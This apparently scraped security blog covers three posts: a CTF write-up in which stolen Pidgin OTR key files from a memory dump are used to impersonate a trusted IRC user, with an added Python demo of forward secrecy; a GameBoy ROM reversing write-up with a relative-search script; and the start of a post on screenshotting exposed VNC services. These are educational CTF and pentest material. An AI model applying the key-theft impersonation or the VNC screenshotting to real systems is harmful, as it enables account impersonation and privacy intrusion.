<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBViz7IeZS9Vq6LrImNQIFkWfjoPBsujBdW4SY-rKy28h7bs9dKZr-NY2RB4P7iotatPdfPGqIQlhS0cWcaISK44UCN6jwRM09PlCyyvzYHeoc18j_EspPEY2XliaKC76YW3xumwSxaug/s1600/carve.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBViz7IeZS9Vq6LrImNQIFkWfjoPBsujBdW4SY-rKy28h7bs9dKZr-NY2RB4P7iotatPdfPGqIQlhS0cWcaISK44UCN6jwRM09PlCyyvzYHeoc18j_EspPEY2XliaKC76YW3xumwSxaug/s1600/carve.png" height="160" width="400" /></a></div>
<br />
Pidgin with the OTR plugin does not log private conversations by default. We can see a couple of OTR-encrypted messages in the memory dump:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx57I1HsVGraU4k30weWgQ_8Y8EuKffKTsRw31jT5YLqiaWC01025ZIzs1sf-xRfQzlskE-MQ18rVzS-99vsMqGVhDopDdHC-hH7EwCGgUn2C7PXckq_aiD302UN4uWuj-6EvnzJmXwl8v/s1600/hex2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx57I1HsVGraU4k30weWgQ_8Y8EuKffKTsRw31jT5YLqiaWC01025ZIzs1sf-xRfQzlskE-MQ18rVzS-99vsMqGVhDopDdHC-hH7EwCGgUn2C7PXckq_aiD302UN4uWuj-6EvnzJmXwl8v/s1600/hex2.PNG" height="48" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOjRIIN7RCnZs0KAl5u_71JbBQ_m17ccFH7eHaIatXOrYEhSPcNYiBEkPE9qefVB8KNK0K7I6ukvFPUu5k1t_nvM58GqvFogN6ZVCG6pF3ubl2e66nqZixEKydn67DZ6QreeTMlH9AJW-N/s1600/hex1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOjRIIN7RCnZs0KAl5u_71JbBQ_m17ccFH7eHaIatXOrYEhSPcNYiBEkPE9qefVB8KNK0K7I6ukvFPUu5k1t_nvM58GqvFogN6ZVCG6pF3ubl2e66nqZixEKydn67DZ6QreeTMlH9AJW-N/s1600/hex1.PNG" height="121" width="400" /></a></div>
<br />
Because of <a href="https://en.wikipedia.org/wiki/Forward_secrecy">Perfect Forward Secrecy</a>, losing control of your long-term private keys does not compromise any previous conversation. All I had was the long-term signature key (<a href="https://gist.github.com/bmaia/a7a2b6e73cd0d9332738">otr.private_key</a>), and that key isn't used to encrypt conversations at all: it only authenticates the ephemeral Diffie-Hellman exchange from which each session's encryption keys are derived. I still needed to retrieve the short-term session keys from memory. I got stuck at this point and spent the whole night trying to figure out how to do that.<br />
<br />
After some time I decided to get some sleep and keep trying it on the following day. The first thing I did the next day was to re-read the challenge description and I quickly figured it out:<br />
<blockquote class="tr_bq">
<i>"A 9447 CTF organizer is giving away flags to <u>friends that he trusts."</u></i></blockquote>
Because of the way IRC works (nicknames are not authenticated unless the network enforces it through services), I could easily impersonate testicool69 (the trusted friend), connect to the IRC server (yodawg.9447.plumbing:6667) and message acidburn88 (the CTF admin) asking for the key. So how do I do that?<br />
<br />
Pidgin-OTR keeps three files for encrypted communication: otr.private_key, otr.instance_tags and otr.fingerprints. I searched for the term "prpl-irc" in the memory dump, extracted those files and dropped them into my own Pidgin installation (%APPDATA%\.purple). There's a <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/gather/pidgin_cred.rb">Metasploit post module</a> to retrieve these keys from a live (hacked) system, by the way...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE2ZSVaiaTYPhyZ-JUN07SUafe1nZaV4d03qNNSjRv0pM3nE56e_hch8gK7azpwjfMTlnYNPmWMaVJg_LszMlvcXz3eOvWpZWU64EG1l4LEV-_j1TofTcOIeWmYbcDbf7pDKiBT-NonOMw/s1600/cript0.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE2ZSVaiaTYPhyZ-JUN07SUafe1nZaV4d03qNNSjRv0pM3nE56e_hch8gK7azpwjfMTlnYNPmWMaVJg_LszMlvcXz3eOvWpZWU64EG1l4LEV-_j1TofTcOIeWmYbcDbf7pDKiBT-NonOMw/s1600/cript0.PNG" height="138" width="400" /></a></div>
<br />
<script src="https://gist.github.com/bmaia/a7a2b6e73cd0d9332738.js"></script><br />
With the stolen private key, my client presented testicool69's fingerprint to acidburn88 and I got the secret flag:<br />
<br />
<div style="text-align: center;">
<b>9447{forensics_champ!}</b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXsvNggFtL3vEDJAsVF_-bwba14KDgMuOFlQEAgNBEDgXv4kA6-ryPgkxDNkJuXIQYhwuYaPPB5d7j3-y0FGhlelF8AVPd31YsYij-Pc5R3FslIbD0lzC8ANiutlKk1mvOi6ZMxJrC_FZW/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXsvNggFtL3vEDJAsVF_-bwba14KDgMuOFlQEAgNBEDgXv4kA6-ryPgkxDNkJuXIQYhwuYaPPB5d7j3-y0FGhlelF8AVPd31YsYij-Pc5R3FslIbD0lzC8ANiutlKk1mvOi6ZMxJrC_FZW/s1600/1.PNG" height="265" width="400" /></a></div>
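To make the key-material argument in this write-up concrete, here is an added Python model; it is not part of the original post and is a deliberately simplified stand-in for the real OTR AKE, using a toy 127-bit group that is insecure outside a demo. Each peer has a long-term signing key (the role of otr.private_key) and a store of trusted fingerprints (the role of otr.fingerprints); every session signs a fresh ephemeral Diffie-Hellman value and derives its key from the shared secret. The wire transcript never contains the session key, so stealing the long-term key afterwards does nothing for past sessions, while using it for a new session passes the peer's fingerprint and signature checks, which is exactly the impersonation used here. The nicknames are those from the challenge; the group parameters, functions and the <code>Party</code> class are my own.

```python
import hashlib
import secrets

# Toy group Z_p^* with the Mersenne prime p = 2^127 - 1. DEMO ONLY: real OTR uses a
# 1536-bit MODP group and DSA; this group is far too small to be secure.
P = (1 << 127) - 1
G = 3
Q = P - 1  # exponents are reduced modulo the group order


def h(*parts):
    m = hashlib.sha256()
    for part in parts:
        m.update(str(part).encode() + b"|")
    return int.from_bytes(m.digest(), "big")


def keygen(rand=secrets.randbelow):
    """Long-term signing key pair (the role of otr.private_key)."""
    x = 1 + rand(Q - 1)
    return x, pow(G, x, P)


def sign(x, msg, rand=secrets.randbelow):
    """Schnorr-style signature in the toy group: (e, s) with s = k - x*e."""
    k = 1 + rand(Q - 1)
    e = h(pow(G, k, P), msg) % Q
    return e, (k - x * e) % Q


def verify(y, msg, sig):
    e, s = sig
    r = pow(G, s, P) * pow(y, e, P) % P  # equals g^k when the signature is genuine
    return h(r, msg) % Q == e


def fingerprint(y):
    """What otr.fingerprints stores: a hash of the peer's long-term public key."""
    return hashlib.sha1(y.to_bytes(16, "big")).hexdigest()


class Party:
    """Minimal OTR-like peer: the long-term key only signs fresh ephemeral DH values."""

    def __init__(self, name, long_term=None, rand=secrets.randbelow):
        self.name, self.rand = name, rand
        self.x, self.y = long_term or keygen(rand)
        self.trusted = {}  # peer nick -> fingerprint we have verified (otr.fingerprints)

    def dh_offer(self):
        self.a = 1 + self.rand(Q - 1)  # ephemeral secret, gone once the session ends
        pub = pow(G, self.a, P)
        return pub, sign(self.x, pub, self.rand)  # only pub and the signature go on the wire

    def dh_accept(self, peer_name, peer_pub, sig, peer_y):
        if fingerprint(peer_y) != self.trusted.get(peer_name) or not verify(peer_y, peer_pub, sig):
            raise PermissionError(f"{peer_name}: untrusted fingerprint or bad signature")
        shared = pow(peer_pub, self.a, P)
        return hashlib.sha256(shared.to_bytes(16, "big")).digest()  # session key, never sent


def run_session(alice, bob):
    """One authenticated key exchange; returns (wire transcript, alice's key, bob's key)."""
    a_pub, a_sig = alice.dh_offer()
    b_pub, b_sig = bob.dh_offer()
    ka = alice.dh_accept(bob.name, b_pub, b_sig, bob.y)
    kb = bob.dh_accept(alice.name, a_pub, a_sig, alice.y)
    # Everything an observer (or a later dump without the ephemeral secrets) gets to see:
    transcript = {"a_pub": a_pub, "a_sig": a_sig, "b_pub": b_pub, "b_sig": b_sig,
                  "a_y": alice.y, "b_y": bob.y}
    return transcript, ka, kb


def impersonate(victim_name, stolen_x, target):
    """Open a new session with `target` as `victim_name` using a stolen long-term key.
    True when `target` accepts the impostor and both ends derive the same session key."""
    impostor = Party(victim_name, long_term=(stolen_x, pow(G, stolen_x, P)))
    impostor.trusted[target.name] = fingerprint(target.y)
    try:
        _, k_impostor, k_target = run_session(impostor, target)
    except PermissionError:
        return False
    return k_impostor == k_target


if __name__ == "__main__":
    admin, friend = Party("acidburn88"), Party("testicool69")
    admin.trusted[friend.name] = fingerprint(friend.y)
    friend.trusted[admin.name] = fingerprint(admin.y)
    transcript, k1, _ = run_session(admin, friend)
    _, k2, _ = run_session(admin, friend)
    print("session keys differ per session:", k1 != k2)
    print("session key visible in transcript:", k1 in transcript.values())
    print("stolen otr.private_key lets us impersonate the friend:", impersonate("testicool69", friend.x, admin))
    print("a random key does not:", impersonate("testicool69", keygen()[0], admin))
```

The two halves of the demo are the two halves of the write-up: the stolen otr.private_key gives an impostor nothing for the recorded sessions, because the ephemeral exponents never left memory, but it does let the impostor complete a fresh exchange that passes the admin's fingerprint check.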
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-77465316711940236122014-10-24T03:34:00.001-02:002014-10-24T03:50:16.559-02:00Hack.lu 2014 CTF Write Up: At Gunpoint<a href="http://2014.hack.lu/index.php/CaptureTheFlag">Hack.lu's 2014 CTF</a> took place on October 21-23. The event was organized by <a href="https://twitter.com/fluxfingers">fluxfingers</a>, and this year's challenges were really enjoyable, huge props to them. I played with my friends from TheGoonies - after winning the Brazilian CTF <a href="http://ctf.tecland.com.br/Pwn2Win/game/scoreboard/">Pwn2Win</a> we are now getting better organized to become more competitive. There are quite a few write ups around and I decided to post about a few tasks which we had a different solution from other teams.<br />
<br />
<b>Task: At Gunpoint (Reversing - 200)</b><br />
<br />
<div class="code">
You're the sheriff of a small town, investigating news about a gangster squad passing by. Rumor has it they're easy to outsmart, so you have just followed one to their encampment by the river. You know you can easily take them out one by one, if you would just know their secret handshake.
</div>
<br />
Download provided: <a href="https://wildwildweb.fluxfingers.net/static/chals/gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat">gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat</a><br />
<br />
The file utility showed us that it was a GameBoy ROM. Having former console hackers on the team came in handy during this challenge, as we already knew which tools to use and what to look for.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVR_jFQjRlLYTzuvCqQKhsnSeoDIRvRBsFEFcMXgOGC_jmd2KxKwN_PynKmFN4Ro4Fh1dEiSjUm9ry5UQh-ZT5oZH-yTOGV4fElxckYCjKfmwEKYeg6a7hr4tTDb7TO63vfUGi74JhMj5W/s1600/file1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVR_jFQjRlLYTzuvCqQKhsnSeoDIRvRBsFEFcMXgOGC_jmd2KxKwN_PynKmFN4Ro4Fh1dEiSjUm9ry5UQh-ZT5oZH-yTOGV4fElxckYCjKfmwEKYeg6a7hr4tTDb7TO63vfUGi74JhMj5W/s1600/file1.png" height="55" width="400" /></a></div>
<br />
We used <strike>TLayer</strike> <a href="http://www.romhacking.net/utilities/109/">TileMolester</a> from the legendary <a href="http://wiki.nesdev.com/w/index.php/Projects#stuff_by_SnowBro">SnowBro</a> to gather information about the graphics and the font data. Firstly, we switched the Codec to 1bpp and found the font used by the game.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjHQq3jhVELZHS11hDZtbWYAKz8iLCePxwuLG16nvn1BKYFBB5FseRmp1SkO4HVIYhc8Y1zhzGz3B-AfO6WIVvuK5WiMMve3RkxnR9m62SFH_33xeO_bTx9z4STRFBbLlb7bFiB6iz8Lop/s1600/tlayer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjHQq3jhVELZHS11hDZtbWYAKz8iLCePxwuLG16nvn1BKYFBB5FseRmp1SkO4HVIYhc8Y1zhzGz3B-AfO6WIVvuK5WiMMve3RkxnR9m62SFH_33xeO_bTx9z4STRFBbLlb7bFiB6iz8Lop/s1600/tlayer.png" height="297" width="320" /></a></div>
<br />
We were about to create a character table when, after switching the Codec to 2bpp planar (GameBoy's native Codec), we found something interesting:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsicnbNAzxK8EgwgqAb3LXPLa6V_sUxtwqHRN6l0n0gRrf2WFRt79wIzFlF7AsVzkZOTkjr3bgqC2l-2eJJafkn84sjkg_AmG0LV0c2KRJShSHBT5SFdlpZ8snHenLovamO5biNzaOGXu/s1600/tlayer2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsicnbNAzxK8EgwgqAb3LXPLa6V_sUxtwqHRN6l0n0gRrf2WFRt79wIzFlF7AsVzkZOTkjr3bgqC2l-2eJJafkn84sjkg_AmG0LV0c2KRJShSHBT5SFdlpZ8snHenLovamO5biNzaOGXu/s1600/tlayer2.png" height="313" width="320" /></a></div>
<br />
After some offset adjustment (using +, -, Shift + left and Shift + right) we got this image:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkCNu9UDrC18FMBnFEyVqRd3j92h9lZb7SnKzIprYvk0J2xrNCK4_TtwZ1RMWfJvwvP3PsIpTnTc7BRgpKwH7dkUNZV2wrckujq80hmv9wmPGt1XMdL52n77yZL1lz34NYzf0dDmib4iZJ/s1600/tlayer3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkCNu9UDrC18FMBnFEyVqRd3j92h9lZb7SnKzIprYvk0J2xrNCK4_TtwZ1RMWfJvwvP3PsIpTnTc7BRgpKwH7dkUNZV2wrckujq80hmv9wmPGt1XMdL52n77yZL1lz34NYzf0dDmib4iZJ/s1600/tlayer3.png" height="146" width="320" /></a></div>
<br />
We submitted the key "tkCXDtheQDNRN", but it wasn't accepted. I wanted to confirm that those tiles were disposed in a linear way, so I kept analyzing the ROM.<br />
<br />
The GameBoy's screen has a resolution of 20x18 tiles. In order to check if the order of the tiles (and the flag) was correct, I performed a relative search using <a href="https://code.google.com/p/ricardojricken/">Darkl0rd's Monkey-Moore</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyq6srfw9ACbBtvP6pso7grV7qlS2sR2ooDcPQD-vDtypvjDqvthSVABwkxnmyskQqYNDLlQEh7GLLkmMiSiClj-m4VHG3hR7ePQ7_87xm8EIleOnQ68dQGeJwadVAlUL1kCJdVFM4YUw1/s1600/moore.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyq6srfw9ACbBtvP6pso7grV7qlS2sR2ooDcPQD-vDtypvjDqvthSVABwkxnmyskQqYNDLlQEh7GLLkmMiSiClj-m4VHG3hR7ePQ7_87xm8EIleOnQ68dQGeJwadVAlUL1kCJdVFM4YUw1/s1600/moore.PNG" height="297" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Let's imagine a grid containing the tiles for the key "tkCXDtheQDNRN" sequentially. Considering the first tile as an A, the second one would be B, the third one C and so on. After 20 bytes (the screen width) there should be something like a line break: that's why I performed a relative search for ABCDEFGHIJKLMNOPQRST*UVWXYZ.<br />
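The relative search that Monkey-Moore performs can be reproduced in a few lines of Python. The script below is an added example, not code from the original post: it scans a ROM for any run of bytes whose differences match the differences between the characters of the pattern, treating <code>*</code> as a single wildcard byte, and derives the character table implied by a hit. The ROM it scans is a constructed byte string with the 20-tiles, break, 6-tiles layout described above placed at a chosen offset; the base value 0x15 for the first tile is the one found in the ROM analysis that follows.

```python
def relative_search(rom, pattern, wildcard="*"):
    """Return [(offset, base)] for every place in `rom` where the byte values step
    exactly like the characters of `pattern` (a relative search).

    Characters are compared to the lowest character in the pattern, so the search
    only assumes the font stores those characters contiguously and in ASCII order
    (true for "ABC...Z" or "abc...z", not for a mix of both). `wildcard` matches
    one arbitrary byte, e.g. a line-break tile. `base` is the byte value that
    encodes the lowest character of the pattern.
    """
    lo = min(ord(c) for c in pattern if c != wildcard)
    deltas = [(i, ord(c) - lo) for i, c in enumerate(pattern) if c != wildcard]
    first_idx, first_delta = deltas[0]
    span = max(d for _, d in deltas)
    hits = []
    for off in range(len(rom) - len(pattern) + 1):
        base = rom[off + first_idx] - first_delta
        if 0 <= base <= 255 - span and all(rom[off + i] == base + d for i, d in deltas):
            hits.append((off, base))
    return hits


def derive_table(pattern, base, wildcard="*"):
    """Character table {tile_byte: char} implied by a relative-search hit."""
    lo = min(ord(c) for c in pattern if c != wildcard)
    return {base + ord(c) - lo: c for c in pattern if c != wildcard}


def sample_rom():
    """Constructed ROM image (not the challenge file): filler, then 20 ascending tile
    indices starting at 0x15, a 0x00 break, six more ascending indices, more filler."""
    return b"\xff" * 256 + bytes(range(0x15, 0x29)) + b"\x00" + bytes(range(0x29, 0x2F)) + bytes(64)


if __name__ == "__main__":
    rom = sample_rom()
    for offset, base in relative_search(rom, "ABCDEFGHIJKLMNOPQRST*UVWXYZ"):
        print(f"hit at 0x{offset:04x}, 'A' = 0x{base:02x}")
        print(derive_table("ABCDEFGHIJKLMNOPQRST*UVWXYZ", base))
```

Replace <code>sample_rom()</code> with the bytes of a real ROM and the pattern with the string you expect on screen; a search without the wildcard fails on this layout, which is exactly why the break after 20 tiles had to be part of the pattern.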
<br />
If we go to offset 0x0965 of the ROM in a hex editor, we find that this is indeed the section responsible for displaying the tiles:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDsq3oEuI9VEZaTuH6ub3ZqYDDJIf7y-cmUO5hOp4GycbxtJmt0gwNe0Bqc0uyuwpzzcz_KfjkLKIZPVlRsm8_mRSn65vCCGRtBy8QAZuE_vD-QSXPy5g3sEPrUkonBpWf6kRDBR7whv0S/s1600/hex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDsq3oEuI9VEZaTuH6ub3ZqYDDJIf7y-cmUO5hOp4GycbxtJmt0gwNe0Bqc0uyuwpzzcz_KfjkLKIZPVlRsm8_mRSn65vCCGRtBy8QAZuE_vD-QSXPy5g3sEPrUkonBpWf6kRDBR7whv0S/s1600/hex.PNG" height="296" width="640" /></a></div>
<br />
Let's compare it with the emulator's BGMAP when displaying the key:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0poB_VAeAmGeFL65RgdXEixTLfsmwgQG-0au8eo9D0a9nl2tvi5uZ3fA0kBQa-u27NckI04K3d8ShMs_iONoY1LFrtsbGeePhsrykociH7Y6PlYBr_W3xkFJP0sU05NWDHPlvnP_McSmb/s1600/hexview.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0poB_VAeAmGeFL65RgdXEixTLfsmwgQG-0au8eo9D0a9nl2tvi5uZ3fA0kBQa-u27NckI04K3d8ShMs_iONoY1LFrtsbGeePhsrykociH7Y6PlYBr_W3xkFJP0sU05NWDHPlvnP_McSmb/s1600/hexview.PNG" height="114" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5etnQANHu5YtEpb20V5mmyEiVUu5AziB7hJzbBIX1rE6iYwFz1wkIaBdv2Q3n0D8KG72CUUmM2Mf3WWHqJIAytNcgsZQ5UtZ50B-Kp4iOWDBUSd7C6xE356WzPncneJbyEvVGdenmeadT/s1600/bug.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5etnQANHu5YtEpb20V5mmyEiVUu5AziB7hJzbBIX1rE6iYwFz1wkIaBdv2Q3n0D8KG72CUUmM2Mf3WWHqJIAytNcgsZQ5UtZ50B-Kp4iOWDBUSd7C6xE356WzPncneJbyEvVGdenmeadT/s1600/bug.PNG" height="303" width="400" /></a></div>
<br />
I'm not sure if this was intentional, but there's something strange in this key display screen. The first tile of the char "t" (0x15) is followed by the first tile of "k" (0x16), which is followed by the first tile of "C" (0x17), and so on until we reach "N" (0x28). There's a break at offset 0x0979 (0x00) and the second half of these tiles (0x29 0x2A 0x2B ... 0x3C) ends with a 0x3D instead of the usual 0x00. We can see this clearly in the screenshot above, as the tile highlighted by the mouse pointer (0x3D) is off the edge of the screen.<br />
<br />
Anyway, we apparently had the correct flag but we took some time to figure out that the 6th letter was a "J" and not a "t". One member from our team figured that out and submitted the correct key "tkCXDJheQDNRN".<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQTUvkXxySqB2ZNl-FROCNWG_LBu-7gQYeCUebpMbKfWGZyAXM6GHc3WE_iMAQB_SXqpbn_YBmfa7CrFEeoGQ2pVkUllYsUuUE7eO8OvYXr4tov7tUN4BgLhRw8a2lbyjN-ffl7Dy8yUWi/s1600/w00t.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQTUvkXxySqB2ZNl-FROCNWG_LBu-7gQYeCUebpMbKfWGZyAXM6GHc3WE_iMAQB_SXqpbn_YBmfa7CrFEeoGQ2pVkUllYsUuUE7eO8OvYXr4tov7tUN4BgLhRw8a2lbyjN-ffl7Dy8yUWi/s1600/w00t.PNG" height="218" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
There are other solutions to this challenge, like <a href="http://tasteless.se/2014/10/hack-lu-ctf-2014-at-gunpoint/">this one from Tasteless</a>. I'm still waiting for a write-up from someone who actually reversed and inputted the secret combination. Anyway, none of them are going to be as elegant as the one from <a href="https://twitter.com/angealbertini">@angealbertini</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkKBom4_eWWbUQhVmLi4VoWES3HQDhTztEifIHSnn7UDKOTIaIsJNRr214jov4FBx2rJWedZPzF9KVvb5ViJRA-AOdnwk9YQl3XghhWK-mLP86iesDW-U2WWb-sgjVsUKez0uu_8IHGZY_/s1600/ange.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkKBom4_eWWbUQhVmLi4VoWES3HQDhTztEifIHSnn7UDKOTIaIsJNRr214jov4FBx2rJWedZPzF9KVvb5ViJRA-AOdnwk9YQl3XghhWK-mLP86iesDW-U2WWb-sgjVsUKez0uu_8IHGZY_/s1600/ange.PNG" height="75" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRt_InGFiU6kXjdJSXUkcf_nTvp3oilsukUXgeKDp2ggy4T750AizLm62MZSzS-af-meO8XxNHQV6C-BcvSBCGAmoX4T56t_5nSEbri56HWsr0hT_80HiAAJJbcfbp7qDBrR63D3Ybv7LL/s1600/ange2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRt_InGFiU6kXjdJSXUkcf_nTvp3oilsukUXgeKDp2ggy4T750AizLm62MZSzS-af-meO8XxNHQV6C-BcvSBCGAmoX4T56t_5nSEbri56HWsr0hT_80HiAAJJbcfbp7qDBrR63D3Ybv7LL/s1600/ange2.PNG" height="212" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Bernardo Rodrigues<br />
<br />
<b>Scan the Internet & Screenshot All the Things</b> (published 2014-08-17, updated 2014-08-22)<br />
<br />
During Defcon 22, <a href="https://twitter.com/erratarob">@ErrataRob</a>, <a href="https://twitter.com/paulm">@paulm</a> and <a href="https://twitter.com/viss">@Viss</a> (mass)scanned the Internet and presented some <a href="https://www.defcon.org/html/defcon-22/dc-22-speakers.html#Graham">Tips, Tricks and Results</a>. Lots of people confronted <a href="https://twitter.com/viss">@Viss</a> after he posted some <a href="https://twitter.com/Viss/media">VNC screenshots on his Twitter timeline</a>. He posted a <a href="http://atenlabs.com/blog/scanning-the-whole-internet/">follow-up article on his blog</a> and Kashmir Hill, from Forbes, wrote an <a href="http://www.forbes.com/sites/kashmirhill/2014/08/13/so-many-pwns/">article</a> about the exposed VNC services.<br />
<br />
Internet scanning isn't new anymore, yet people are still surprised by these results. For this post, I'll share some techniques I commonly use to map and screenshot several Internet services during pentest engagements. All of this could easily be adapted for other protocols and services, so let's start to Screenshot All the Things.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieXs8_k_zz-DzMaSIzz9s0kqOwwIOV2SDzDG_FZC6EqshRaBTu3OUjU7F3d-qgiZt4jjigRtviZipPfTUrtb4pcq0ik96w7ubY_kWXBJAB3-YdtLzsEOAPahOgI-etsLjeBvlsgufHma-b/s1600/16284207.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieXs8_k_zz-DzMaSIzz9s0kqOwwIOV2SDzDG_FZC6EqshRaBTu3OUjU7F3d-qgiZt4jjigRtviZipPfTUrtb4pcq0ik96w7ubY_kWXBJAB3-YdtLzsEOAPahOgI-etsLjeBvlsgufHma-b/s1600/16284207.jpg" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<b>VNC</b><br />
<br />
The easiest way to snapshot these services is to use preexisting tools and script/mod them according to your needs. In order to take screenshots from VNC, I generally use <a href="https://kanaka.github.io/noVNC/">noVNC</a> (an HTML5 VNC client) and a <a href="http://www.binarytides.com/take-webpage-screenshot-from-command-line-in-ubuntu-linux/">command line utility to capture WebKit's rendering of a web page</a>.<br />
<br />
The process is pretty straightforward:<br />
<br />
1 - Clone the noVNC project from <a href="https://github.com/kanaka/noVNC">github</a>:<br />
<br />
<div class="code">
git clone git://github.com/kanaka/noVNC</div>
<br />
2 - Start the mini-webserver and specify the location of the VNC server you want to screenshot:<br />
<br />
<div class="code">
./noVNC/utils/launch.sh --vnc 192.168.1.142:5900</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC7ejH7m87BE9RsLfgVrQF_sQwS7tkX4Qvxua2FMLVSUmkazq1lTeYqBLmVdoEGCmY8Ub1UrF3QcQG3Q2sEKEubK_O5lEpXXiv_eelgHfghNImY64ZoC4789QgpMe_uRNeqAoNhwPJqM73/s1600/111.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC7ejH7m87BE9RsLfgVrQF_sQwS7tkX4Qvxua2FMLVSUmkazq1lTeYqBLmVdoEGCmY8Ub1UrF3QcQG3Q2sEKEubK_O5lEpXXiv_eelgHfghNImY64ZoC4789QgpMe_uRNeqAoNhwPJqM73/s1600/111.png" height="261" width="400" /></a></div>
<br />
3 - Take a <a href="http://www.binarytides.com/take-webpage-screenshot-from-command-line-in-ubuntu-linux/">webpage screenshot</a> from command line using <a href="http://cutycapt.sourceforge.net/">CutyCapt</a>, for example:<br />
<br />
<div class="code">
cutycapt --url="http://127.0.0.1:6080/vnc_auto.html" --javascript=on --out=vnc.png --delay=3000</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
